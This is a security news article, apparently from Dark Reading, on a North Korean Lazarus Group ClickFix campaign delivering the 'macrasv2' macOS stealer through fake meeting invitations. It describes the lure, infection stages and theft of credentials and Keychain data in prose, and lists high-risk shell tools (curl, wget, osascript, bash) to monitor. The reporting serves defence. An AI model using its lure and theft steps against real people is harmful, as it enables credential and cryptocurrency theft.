North Korea’s Lazarus Group is using ClickFix attacks to launch cyberattacks using novel macOS malware.
That’s according to security vendor Any.Run, which on April 21 published research concerning a new nation-state threat campaign. Authored by offensive security expert and Birmingham Cyber Arms founder Mauro Eldritch, the report covers a wave of ClickFix attacks targeting organizations, used to distribute a range of malware. This latest research focuses primarily on a newly identified macOS malware kit that is currently being leveraged in the wild.
ClickFix is a social engineering technique that rose to prominence over the past year or so. A threat actor tricks the victim into visiting attacker-operated infrastructure, such as a website masquerading as a fake Zoom meeting.
When the victim reaches the Web page, they are told there are technical issues that may only be resolved if they update their software. The attacker usually instructs the victim into running malicious code, either by copying and pasting a run command (on Windows) or downloading and opening a file with the code on it (typically in macOS).
ClickFix has been a favorite tactic of North Korean threat actors lately. Entities like Lazarus Group use it for initial access, with the ultimate goal of stealing cryptocurrency or intellectual property, or to conduct espionage. In this latest campaign, Lazarus Group is targeting FinTech, cryptocurrency, and high-value leaders in organizations with a substantial reliance on macOS devices.
The Complete macOS Malware Attack Chain
According to Eldritch, an attacker contacts a business leader through Telegram, often by using a compromised account belonging to a colleague or contact known to the target. The attacker sends the target a fake Zoom, Microsoft Teams, or Google Meet invitation to set up a conversation under the pretense of a business opportunity. North Korean actors have also used a potential job offer as a lure.
The target joins the call and is prompted to enter a command to fix connection issues. Because the command is entered by the user, many traditional security controls remain untriggered. And because users are conditioned to agree to taking actions like updating software, techniques like ClickFix might not raise as many red flags to the user as a traditional phishing email. Especially when the attacker uses a business meeting as a means of lowering the target’s guard ahead of time.
Then, “the operation is focused on extracting business value as quickly as possible,” the blog post read. “The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data.” Such assets can then provide access to corporate systems, software-as-a-service (SaaS) platforms, and financial resources, Any.Run added.
Once the user enters the command and connects to attacker infrastructure, malware is downloaded as a macOS application .bin file under an unassuming name, like “teamsSDK.bin.” This application installs the second stage binary and includes additional ways of gaining the user’s trust, such as a message saying software is updated.
The next binary is a system profiler that connects to attacker-hosted command-and-control (C2) infrastructure. This is then followed by a persistence mechanism that re-invokes the malware kit at every login before the primary component, a stealer named “macrasv2,” is loaded.
The stealer stages previously collected data like browser extension data, stored browser credentials and cookies, macOS keychain entries, and more, and consolidates them into a temporary directory for exfiltration through Telegram. Macrasv2 then runs a self-deletion script and the infection chain is complete.
While many North Korean state-sponsored attacks are sophisticated in nature, Eldritch noted that macrasv2 is “badly written.” Several components remain either unimplemented or incorrectly implemented, while some components enter “infinite loops that may expose its presence due to system resource starvation.” The malware also left multiple operational security weaknesses, including exposed Telegram bot tokens and C2 endpoints with missing authentication.
How to Avoid ClickFix Compromise
While Any.Run’s blog contains indicators of compromise, it must also be noted that no matter how sophisticated an attack chain may seem, ClickFix only works if the end user runs a command or downloads a file.
As such, the best way for organizations to combat ClickFix is to educate leaders and employees on how the technique works and why it’s successful, and not to run suspicious commands or open files as a means to solve connectivity problems.
Aleksey Lapshin, CEO of Any.Run, tells Dark Reading that Mac users in particular should be trained out of the illusion of safety many have, based on a history of being told “Macs don’t get malware.” Organizations should also actively track ClickFix samples in the wild and feed the actual commands back into EDR rules and execution policies. Finally, log and restrict high-risk commands on endpoints like curl, wget, osascript, and bash; the CEO says many organizations don’t monitor this at all, especially on macOS.
“Attackers always look for the cheapest entry point with the highest hit rate. Breaking through the outer moat of enterprise security, such as email gateways, EDR, perimeter filtering, gets more expensive every year, so they’re picking new paths,” Lapshin says. “And the cheapest path right now is one where the attacker is literally the user, voluntarily executing commands on their own machine.”
